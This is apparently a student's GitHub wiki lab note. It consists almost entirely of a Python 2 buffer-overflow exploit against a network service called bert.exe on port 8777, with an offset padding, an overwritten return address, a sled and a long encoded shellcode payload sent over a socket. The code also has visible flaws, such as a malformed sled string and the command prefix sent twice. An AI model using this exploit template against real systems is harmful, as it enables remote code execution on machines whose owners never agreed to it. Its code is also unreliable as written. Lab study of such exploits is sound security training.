Buffer Overflow with Bert.exe - Henryisgreat/TechJournal GitHub Wiki

image OPEN PORT ON 8777 - prolly bert.exe

#! /usr/bin/python2 import socket; import sys;

ip="192.168.0.21" port = 8777 #default TRUN port prefix = 'BERT /.:/'

offset = 'A' * 1744 eip = "\x3c\x15\x50\x43"

sled = "\x090" * 32 buf = b"" buf += b"\xb8\x7c\x21\xd2\xe7\xd9\xc0\xd9\x74\x24\xf4\x5f" buf += b"\x29\xc9\xb1\x52\x31\x47\x12\x03\x47\x12\x83\x93" buf += b"\xdd\x30\x12\x97\xf6\x37\xdd\x67\x07\x58\x57\x82" buf += b"\x36\x58\x03\xc7\x69\x68\x47\x85\x85\x03\x05\x3d" buf += b"\x1d\x61\x82\x32\x96\xcc\xf4\x7d\x27\x7c\xc4\x1c" buf += b"\xab\x7f\x19\xfe\x92\x4f\x6c\xff\xd3\xb2\x9d\xad" buf += b"\x8c\xb9\x30\x41\xb8\xf4\x88\xea\xf2\x19\x89\x0f" buf += b"\x42\x1b\xb8\x9e\xd8\x42\x1a\x21\x0c\xff\x13\x39" buf += b"\x51\x3a\xed\xb2\xa1\xb0\xec\x12\xf8\x39\x42\x5b" buf += b"\x34\xc8\x9a\x9c\xf3\x33\xe9\xd4\x07\xc9\xea\x23" buf += b"\x75\x15\x7e\xb7\xdd\xde\xd8\x13\xdf\x33\xbe\xd0" buf += b"\xd3\xf8\xb4\xbe\xf7\xff\x19\xb5\x0c\x8b\x9f\x19" buf += b"\x85\xcf\xbb\xbd\xcd\x94\xa2\xe4\xab\x7b\xda\xf6" buf += b"\x13\x23\x7e\x7d\xb9\x30\xf3\xdc\xd6\xf5\x3e\xde" buf += b"\x26\x92\x49\xad\x14\x3d\xe2\x39\x15\xb6\x2c\xbe" buf += b"\x5a\xed\x89\x50\xa5\x0e\xea\x79\x62\x5a\xba\x11" buf += b"\x43\xe3\x51\xe1\x6c\x36\xf5\xb1\xc2\xe9\xb6\x61" buf += b"\xa3\x59\x5f\x6b\x2c\x85\x7f\x94\xe6\xae\xea\x6f" buf += b"\x61\x11\x42\x6e\x64\xf9\x91\x70\xa4\xb0\x1c\x96" buf += b"\xc2\x52\x49\x01\x7b\xca\xd0\xd9\x1a\x13\xcf\xa4" buf += b"\x1d\x9f\xfc\x59\xd3\x68\x88\x49\x84\x98\xc7\x33" buf += b"\x03\xa6\xfd\x5b\xcf\x35\x9a\x9b\x86\x25\x35\xcc" buf += b"\xcf\x98\x4c\x98\xfd\x83\xe6\xbe\xff\x52\xc0\x7a" buf += b"\x24\xa7\xcf\x83\xa9\x93\xeb\x93\x77\x1b\xb0\xc7" buf += b"\x27\x4a\x6e\xb1\x81\x24\xc0\x6b\x58\x9a\x8a\xfb" buf += b"\x1d\xd0\x0c\x7d\x22\x3d\xfb\x61\x93\xe8\xba\x9e" buf += b"\x1c\x7d\x4b\xe7\x40\x1d\xb4\x32\xc1\x2d\xff\x1e" buf += b"\x60\xa6\xa6\xcb\x30\xab\x58\x26\x76\xd2\xda\xc2" buf += b"\x07\x21\xc2\xa7\x02\x6d\x44\x54\x7f\xfe\x21\x5a" buf += b"\x2c\xff\x63"

#6250153C

buffer = prefix + offset + eip + sled + buf

print("Fuzzing BERT with %s bytes " % len(buffer)) s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect = s.connect((ip,port)) s.send((prefix+buffer)) s.close()